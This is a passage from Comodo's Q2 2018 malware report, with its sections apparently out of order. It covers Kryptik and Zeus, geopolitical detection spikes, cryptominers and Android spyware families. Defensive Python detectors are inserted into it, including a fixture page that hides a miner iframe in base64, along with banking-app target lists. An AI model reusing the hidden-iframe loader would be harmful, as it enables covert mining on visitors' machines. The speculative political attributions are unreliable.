First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military, and intelligence activities. These agencies then immediately began to fulfill those requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social life to business, politics, or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

WinstarNssmMiner spreading around the world

Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.

The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way, CoinMiner has the victim's computer to itself and uses its resources to mine cryptocurrency.

Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking websites' code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.

As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we can find the familiar link to CoinHive.

The link to CoinHive

What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code, but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
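A check for the hiding technique just described needs to look past the encoded string: decode what is handed to atob()/unescape()/decodeURIComponent(), then look inside for 1x1 iframes and for frame sources on the CoinHive domain or its cnhv.co short-link host. The Python below is an added example, not code from the report; the page it scans is constructed at run time, the short-link path is a placeholder, and the domain list contains only the two hosts this section names.

```python
"""Find CoinHive-style miners hidden behind encoded strings and 1x1 iframes.

Added example; not code from the Comodo report. It scans page HTML for
string literals passed to atob()/unescape()/decodeURIComponent(), decodes
them, and flags (a) iframes sized 1x1 or smaller and (b) frame/script URLs
on the CoinHive service domain or its cnhv.co short-link host, which the
section above shows. The sample page is constructed here at run time; the
short-link path 'PLACEHOLDER' is not a real code.
"""
import base64
import re
import urllib.parse

MINER_HOSTS = {"coinhive.com", "cnhv.co"}

# fn('literal') where fn is one of the three decoders web pages commonly use
_ENCODED_ARG = re.compile(r"""(atob|unescape|decodeURIComponent)\(\s*(['"])(.*?)\2\s*\)""", re.S)
_IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
_ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
_SRC_URL = re.compile(r"""(?:src|href)\s*=\s*['"]?(https?://[^'"\s>]+)""", re.I)


def decode_embedded_strings(html: str):
    """Yield the plaintext of every atob()/unescape()/decodeURIComponent() literal."""
    for fn, _quote, lit in _ENCODED_ARG.findall(html):
        try:
            if fn == "atob":
                padded = lit + "=" * (-len(lit) % 4)
                yield base64.b64decode(padded).decode("utf-8", "replace")
            else:
                yield urllib.parse.unquote(lit)
        except (ValueError, UnicodeDecodeError):
            continue


def iframe_attrs(tag: str) -> dict:
    """Attribute name -> value for one <iframe ...> opening tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in _ATTR.finditer(tag)}


def _px(value):
    digits = re.match(r"\d+", value or "")
    return int(digits.group()) if digits else None


def scan_page(html: str) -> dict:
    """Scan the raw page plus every decoded layer for hidden frames and miner URLs."""
    findings = {"hidden_iframes": [], "miner_urls": []}
    layers = [html, *decode_embedded_strings(html)]
    for text in layers:
        for tag in _IFRAME.findall(text):
            attrs = iframe_attrs(tag)
            w, h = _px(attrs.get("width")), _px(attrs.get("height"))
            if w is not None and h is not None and w <= 1 and h <= 1:
                findings["hidden_iframes"].append(attrs.get("src", ""))
        for url in _SRC_URL.findall(text):
            host = urllib.parse.urlsplit(url).hostname or ""
            if host in MINER_HOSTS or any(host.endswith("." + m) for m in MINER_HOSTS):
                findings["miner_urls"].append(url)
    return findings


def build_sample_page() -> str:
    """Constructed page: a 1x1 iframe to the short-link host, wrapped in base64
    and written out by document.write(atob(...)), as the section describes."""
    iframe = ('<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1" '
              'style="display:none"></iframe>')
    b64 = base64.b64encode(iframe.encode()).decode()
    return ("<html><body><h1>Welcome</h1>"
            "<script>document.write(atob('%s'));</script>"
            "</body></html>" % b64)


SAMPLE_PAGE = build_sample_page()
CLEAN_PAGE = ('<html><body><iframe src="https://example.com/video" width="640" '
              'height="360"></iframe></body></html>')

if __name__ == "__main__":
    print("obfuscated page:", scan_page(SAMPLE_PAGE))
    print("clean page:     ", scan_page(CLEAN_PAGE))
```

A plain text search of the raw page finds nothing, which is exactly the effect the section describes; only after decoding the atob() argument do the hidden frame and the short-link host become visible.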

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
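The swap described in this section has a recognisable shape in clipboard-change telemetry: a wallet address is replaced by a different address of the same coin within a fraction of a second, by a process other than the one that set it. The Python below is an added example, not from the Comodo report, that applies that rule to a constructed event stream; the two BTC addresses are the ones quoted in the example above, while the process names, timings and ETH-format strings are invented for the demonstration.

```python
"""Spot a clipboard hijacker from clipboard-change telemetry.

Added example, not from the Comodo report. The hijacker described above
waits for a wallet address on the clipboard and overwrites it with its own.
Seen as a stream of clipboard-change events, that is a distinctive shape:
an address is replaced by a different address of the same coin, almost
instantly, by a process other than the one that put it there. The event
stream, process names and ETH-format strings below are constructed.
"""
import re

# Format checks only (no checksum): enough to recognise "this is an address".
ADDRESS_PATTERNS = {
    "BTC": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{39,59})$"),
    "ETH": re.compile(r"^0x[a-fA-F0-9]{40}$"),
}
SWAP_WINDOW_SECONDS = 2.0  # a human re-copying a second address takes longer


def address_type(text):
    """Return 'BTC', 'ETH' or None for the clipboard text."""
    text = text.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return coin
    return None


def detect_clipboard_swaps(events, window=SWAP_WINDOW_SECONDS):
    """events: list of (seconds, process_name, clipboard_text) in time order.
    Returns one dict per consecutive pair that looks like a hijacker swap:
    same coin, different address, within `window`, written by another process."""
    alerts = []
    for (t0, proc0, txt0), (t1, proc1, txt1) in zip(events, events[1:]):
        coin0, coin1 = address_type(txt0), address_type(txt1)
        if (coin0 and coin0 == coin1 and txt0.strip() != txt1.strip()
                and (t1 - t0) <= window and proc1 != proc0):
            alerts.append({"coin": coin0, "original": txt0.strip(),
                           "replacement": txt1.strip(), "process": proc1,
                           "delay": t1 - t0})
    return alerts


# Constructed telemetry. The two BTC addresses are the ones quoted in the
# report's example; everything else (processes, times, ETH strings) is invented.
EVENTS = [
    (0.0, "explorer.exe", "invoice #4471"),
    (5.0, "chrome.exe", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    (5.2, "bundled_player.exe", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),
    (60.0, "chrome.exe", "0x52908400098527886E0F7030069857D2E4169EE7"),
    (95.0, "chrome.exe", "0xde709f2102306220921060314715629080e2fb77"),
]

if __name__ == "__main__":
    for alert in detect_clipboard_swaps(EVENTS):
        print(f"ALERT {alert['coin']}: {alert['original']} -> {alert['replacement']} "
              f"by {alert['process']} after {alert['delay']:.1f}s")
```

The later pair of ETH addresses does not fire: the same process set both and 35 seconds passed, which is what a user copying a second address looks like. On a real endpoint the events would come from a clipboard-monitoring sensor; the rule itself needs only the three fields shown.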

An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise, and promise to become a new serious challenge for cybersecurity departments and vendors.

4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician, or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners, and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks

Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible and constantly change disguises to avoid detection, honing their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version 1: Naver Defender

Version 2: Netease Defender

Version 3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contacts' IDs, names, and phone numbers, and the owner's email address. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type), and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server, httphttpcgalimcomadminhrpupuphpdo=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps, and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version 3 of KevDroid takes photos, records calls, and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This assumption can be costly: the first version of the Desert Scorpion spyware was distributed through Google Play. The spyware was camouflaged as a chat application called Dardesh. When a user downloaded and ran it, the app covertly connected to the cybercriminals' command-and-control (C&C) server and downloaded the spyware onto the device. From that moment, the spyware kept track of all events on the infected device. Social networks were another means of dissemination.

Version 1: Dardesh, Google Play Services, Instant Apps
Version 2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone, a feature set comparable to commercial spyware tools such as FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has four different versions:

Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الكویتیة (Al-Nahar Kuwaiti Newspaper), 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is based on the commercial spyware "Spymaster Pro" and can:

- Enable and disable the GPS services
- Record audio and send it to the command-and-control (C&C) server
- Upload image files
- Collect information about installed applications
- Collect browser data
- Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications such as VPN Easy and DroFirewall. In addition to the abilities of the previous versions, it includes some additional tricks:

- Extracts photos, audio and video
- Records the screen
- Executes shell commands
- Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. Instead of a girlfriend, it delivers a bundle of malicious abilities:

- Takes control of the Bluetooth adapter
- Extracts data about accounts, contacts and installed apps
- Extracts data from the WhatsApp message database and its related keys
- Uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.

Versions 1 to 3: Facebook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

- Extract device information
- Delete SMS
- Set the ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Keep Wi-Fi always turned on

Version 2 can execute additional commands:

- Send SMS and read outgoing SMS
- Enable and disable the Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

App distribution: FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب (Tracker), اسپای ھاید (Spy Hide), Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송 (Live Adult Broadcast), Мобильный антивирус (Mobile Antivirus), droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배 (CJ Logistics parcel delivery), 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент (mobile client), Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known commercial stalkerware applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of LokiBot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player
Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on an infected device:

- Send_SMS - extract SMS content and send it to the C&C server
- Send_USSD - send USSD data to the C&C server
- Gethistory - collect the browser history
- Start_AllApp - gather information about installed applications
- Send_call - set the intent action to place a call
- Forward_call - forward incoming calls
- ResForward_call - reset call forwarding
- Go_Smsmnd - delete SMS content
- Go_GetAlls - get the SMS history
- Dell_sms - delete SMS content in a conversation
- Send_spam - send spam SMS
- Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

佐川急便 (Sagawa Express), 현대캐피탈 (Hyundai Capital)

Disguises of FakeSpy

It collects the available information from the infected device and sends it to its C&C servers. It also checks for the following applications: aucomapp, softbankcomapp, docomocomapp.

Here are some of the commands it accepts from its command-and-control server:

- contacts - get contact details and email ID
- Mute - set the device to mute
- Mms - get MMS content
- info - get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following banking applications:

- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android

The second version can also block access to some apps and sites, including Google Chrome, the Google Play store, Gmail and YouTube.
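The "check for banking applications" behaviour of Xloader and RedAlert above rests on hardcoded target package names, which the malware passes to the Android package manager one by one. Those names live as plain string constants in the APK's classes.dex, so a static scan of the DEX string data is enough to recover the victim list without running the sample. The script below is an added example, not code from the report or from Comodo; the watchlists are the two package lists printed above, while the family labels, the sample APK and its DEX-like content are constructed for the demonstration.

```python
"""Static scan of an Android APK for hardcoded target-package indicators.

Banking trojans such as Xloader and RedAlert carry the package names of the
apps they hunt for as plain string constants, so matching the DEX string
data against a watchlist exposes the victim list.
"""
from __future__ import annotations

import re
import zipfile
from io import BytesIO

# Watchlists transcribed from the report. Family labels are our own grouping.
WATCHLISTS = {
    "xloader_kr_banks": {
        "com.wooribank.pib.smart", "com.kbstar.kbbank", "com.ibk.neobanking",
        "com.sc.danb.scbankapp", "com.shinhan.sbanking",
        "com.hanabank.ebk.channel.android.hananbank", "nh.smart",
        "com.epost.psf.sdsi", "com.kftc.kjbsmb", "com.smg.spbs",
    },
    "redalert_eu_banks": {
        "de.postbank.finanzassistent", "pl.mbank", "aib.ibank.android",
    },
}

# A Java-style package identifier with at least one dot, delimited by
# non-identifier bytes (DEX stores strings NUL-terminated).
PACKAGE_RE = re.compile(rb"(?<![\w.])[a-z][a-z0-9_]*(?:\.[a-z][a-z0-9_]*)+(?![\w.])")


def package_like_strings(blob: bytes) -> set[str]:
    """Return every package-shaped ASCII token in a DEX (or any) byte blob."""
    return {m.group(0).decode("ascii") for m in PACKAGE_RE.finditer(blob)}


def match_watchlists(tokens: set[str]) -> dict[str, set[str]]:
    """Map each watchlist name to the target packages present in `tokens`."""
    hits: dict[str, set[str]] = {}
    for family, targets in WATCHLISTS.items():
        found = tokens & targets
        if found:
            hits[family] = found
    return hits


def scan_apk(apk_bytes: bytes) -> dict[str, set[str]]:
    """Open an APK (a zip) in memory and scan every classes*.dex inside it."""
    tokens: set[str] = set()
    with zipfile.ZipFile(BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            if re.fullmatch(r"classes\d*\.dex", name):
                tokens |= package_like_strings(zf.read(name))
    return match_watchlists(tokens)


def build_sample_apk(dex_payload: bytes) -> bytes:
    """Constructed test fixture: a minimal zip with one classes.dex entry."""
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr("classes.dex", dex_payload)
    return buf.getvalue()


# Constructed DEX-like payload. A real string pool is binary, but package
# names are stored as plain (M)UTF-8, which is what the regex keys on.
SAMPLE_DEX = (
    b"dex\n035\0" + b"\0" * 16
    + b"\0Lcom/example/fakeflash/MainActivity;\0"
    + b"\0com.shinhan.sbanking\0nh.smart\0com.kbstar.kbbank\0"
    + b"\0android.permission.READ_SMS\0de.postbank.finanzassistent\0"
)

if __name__ == "__main__":
    for family, pkgs in scan_apk(build_sample_apk(SAMPLE_DEX)).items():
        print(f"{family}: {', '.join(sorted(pkgs))}")
```

Point `scan_apk` at the bytes of a real APK to triage it; a hit on several entries of one list is a strong sign the sample is a banking trojan built for that region, even before any dynamic analysis. The regex only finds cleartext identifiers, so a sample that stores its list Base64-encoded or XOR-obfuscated (as some Zoo Park versions do for exfiltrated data) needs the strings decoded first.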

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates in Iran. It uses third-party app stores, social networks and messengers for spreading.

Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام (Telegram fancy text), ھمھ کاره (All-in-one), Proxy, دوست یاب (Friend Finder), Telegram Ton, شارژ رایگان بگیر (Get Free Credit), App Master, Anti Rat, PlatformA, فالورگیر نامحدود (Unlimited Follower Getter), اینترنت رایگان (Free Internet)

Disguises of Hero Rat

Its code is sold on a Telegram hacking channel, notably in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning that the app cannot run, but it keeps running in the background and starts its spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram variants aimed at the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more a fraudster than a spy.

Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option. If the user taps this button, the malware begins working in the background, subscribing the user to services she did not order. It reaches victims under the variety of disguises listed above.

4.1.11 CoinHive

The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining capability. It is disseminated via the counterfeit apps listed below, but one of the vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is this possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner, downloads it and plants it on the victims' machines. However, she is unaware that another cybercriminal earlier infected CoinMiner with CoinHive. So the first attacker is a victim too: a thief robbing a thief.

